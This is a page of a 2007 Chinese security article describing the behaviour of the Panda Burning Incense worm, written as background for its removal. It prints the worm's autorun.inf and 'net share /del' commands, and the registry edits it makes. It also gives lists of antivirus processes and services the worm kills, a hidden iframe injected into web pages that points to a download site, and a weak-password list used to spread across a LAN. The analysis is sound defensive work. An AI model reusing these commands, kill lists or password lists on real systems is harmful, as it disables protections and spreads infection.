熊猫烧香病毒专杀及手动修复方案

来源：PConline 作者： 出处：巧巧读书 2007-09-28 进入讨论组

• 关 键 词：
• outlook express
• windows me
• windows nt
• microsoft
• frontpage

上一页 1 2 3 4 5 下一页 

以下是熊猫烧香病毒详细行为和解决办法：

熊猫烧香病毒详细行为：

1.复制自身到系统目录下：

%System%\drivers\spoclsv.exe（“%System%”代表Windows所在目录，比如：C:\Windows）

不同的spoclsv.exe变种，此目录可不同。比如12月爆发的变种目录是：C:\WINDOWS\System32\Drivers\spoclsv.exe。

2.创建启动项：

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]

"svcshare"="%System%\drivers\spoclsv.exe"

3.在各分区根目录生成病毒副本：

X:\setup.exe

X:\autorun.inf

autorun.inf内容：

[AutoRun]

OPEN=setup.exe

shellexecute=setup.exe

shell\Auto\command=setup.exe

4.使用net share命令关闭管理共享：

cmd.exe /c net share X$ /del /y

cmd.exe /c net share admin$ /del /y

5.修改“显示所有文件和文件夹”设置：

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion

\Explorer\Advanced\Folder\Hidden\SHOWALL]

"CheckedValue"=dword:00000000

6.熊猫烧香病毒尝试关闭安全软件相关窗口：

天网

防火墙

进程

VirusScan

NOD32

网镖

杀毒

毒霸

瑞星

江民

黄山IE

超级兔子

优化大师

木马清道夫

木馬清道夫

QQ病毒

注册表编辑器

系统配置实用程序

卡巴斯基反病毒

Symantec AntiVirus

Duba

Windows 任务管理器

esteem procs

绿鹰PC

密码防盗

噬菌体

木马辅助查找器

System Safety Monitor

Wrapped gift Killer

Winsock Expert

游戏木马检测大师

超级巡警

msctls_statusbar32

pjf(ustc)

IceSword

7.尝试结束安全软件相关进程以及Viking病毒（威金病毒）进程：

Mcshield.exe

VsTskMgr.exe

naPrdMgr.exe

UpdaterUI.exe

TBMon.exe

scan32.exe

Ravmond.exe

CCenter.exe

RavTask.exe

Rav.exe

Ravmon.exe

RavmonD.exe

RavStub.exe

KVXP.kxp

KvMonXP.kxp

KVCenter.kxp

KVSrvXP.exe

KRegEx.exe

UIHost.exe

TrojDie.kxp

FrogAgent.exe

Logo1_.exe

Logo_1.exe

Rundl132.exe

8.禁用安全软件相关服务：

Schedule

sharedaccess

RsCCenter

RsRavMon

KVWSC

KVSrvXP

kavsvc

AVP

McAfeeFramework

McShield

McTaskManager

navapsvc

wscsvc

KPfwSvc

SNDSrvc

ccProxy

ccEvtMgr

ccSetMgr

SPBBCSvc

Symantec Core LC

NPFMntor

MskService

FireSvc

9.删除安全软件相关启动项：

SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RavTask

SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KvMonXP

SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav

SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KAVPersonal50

SOFTWARE\Microsoft\Windows\CurrentVersion\Run\McAfeeUpdaterUI

SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Network Associates Error Reporting Service

SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ShStatEXE

SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YLive.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\Run\yassistse

10.遍历目录修改htm/html/asp/php/jsp/aspx等网页文件，在这些文件尾部追加信息：

〈iframe src="hxxp://www.ctv163.com/wuhan/down.htm" width="0" height="0" frameborder="0"> 〈/iframe>

但不修改以下目录中的网页文件：

C:\WINDOWS

C:\WINNT

C:\system32

C:\Documents and Settings

C:\System Volume Information

C:\Recycled

Program Files\Windows NT

Program Files\WindowsUpdate

Program Files\Windows Media Player

Program Files\Outlook Express

Program Files\Internet Explorer

Program Files\NetMeeting

Program Files\Common Files

Program Files\ComPlus Applications

Program Files\Messenger

Program Files\InstallShield Installation Information

Program Files\MSN

Program Files\Microsoft Frontpage

Program Files\Movie Maker

Program Files\MSN Gamin Zone

11.在访问过的目录下生成Desktop_.ini文件，内容为当前日期。

12.此外，病毒还会尝试删除GHO文件。

病毒还尝试使用弱密码将副本以GameSetup.exe的文件名复制到局域网内其它计算机中：

password

harley

golf

pussy

mustang

shadow

fish

qwerty

baseball

letmein

ccc

admin

abc

pass

passwd

database

abcd

abc123

sybase

123qwe

server

computer

super

123asd

ihavenopass

godblessyou

enable

alpha

1234qwer

123abc

aaa

patrick

pat

administrator

root

sex

god

fuckyou

fuck

test

test123

temp

temp123

win

asdf

pwd

qwer

yxcv

zxcv

home

xxx

owner

login

Login

love

mypc

mypc123

admin123

mypass

mypass123

Administrator

Guest

admin

Root

病毒文件内含有这些信息：

whboy

***武*汉*男*生*感*染*下*载*者***

文字：http://www.qqread.com/virus/a293610.html 更多内容请看QQ病毒、手机病毒揭密、病毒专栏专题，或进入讨论组讨论。

上一页 1 2 3 4 5 下一页 

【收藏此文】【大 中 小】【打印】【关闭】

较早的文章：预防第一！熊猫烧香病毒的预防方法

较新的文章：杀病毒：实例讲解如何干掉“熊猫烧香”